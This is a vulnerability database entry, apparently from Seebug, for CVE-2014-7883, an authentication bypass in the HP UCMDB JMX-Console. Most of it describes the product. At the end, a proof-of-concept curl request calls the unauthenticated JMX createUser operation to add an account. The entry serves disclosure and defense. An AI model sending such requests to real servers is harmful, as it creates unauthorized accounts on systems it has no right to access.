Hewlett-Packard UCMDB - JMX-Console Authentication Bypass

2015-09-06T00:00:00
ID SSV:89314
Type seebug
Reporter Jeremy_he
Modified 2015-09-06T00:00:00

Description

<p>CVE-ID: CVE-2014-7883<br></p><p>Affected versions: UCMDB 10.10 (Other versions might also be affected) <br></p><p>The HP Universal CMDB (UCMDB) automatically collects and manages accurate and</p><p>current business service definitions, associated infrastructure relationships and</p><p>detailed information on the assets, and is a central component in many of the key processes in your</p><p>IT organization, such as change management, asset management, service management, and business</p><p>service management. The UCMDB ensures that these processes can rely on comprehensive and</p><p>true data for all business services. Together with HP UCMDB Configuration Manager</p><p>(UCMDB-CM) you can standardize your IT environments, and make sure they comply with clear</p><p>policies, and defined authorization process.</p><p>Many IT organizations turn to a CMDB and configuration management processes to create a</p><p>shared single version of truth to support business service management, IT service management,</p><p>change management, and asset management initiatives. These initiatives help align IT efforts</p><p>with business requirements and run IT operations more efficiently and effectively.</p><p>The initiatives success depends on the CMDB providing a complete view into the</p><p>configuration items (CIs) and assets as well as how various IT elements relate together to deliver</p><p>the business service.</p>

                                        
                                            
                                                curl -I
"http://site:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser"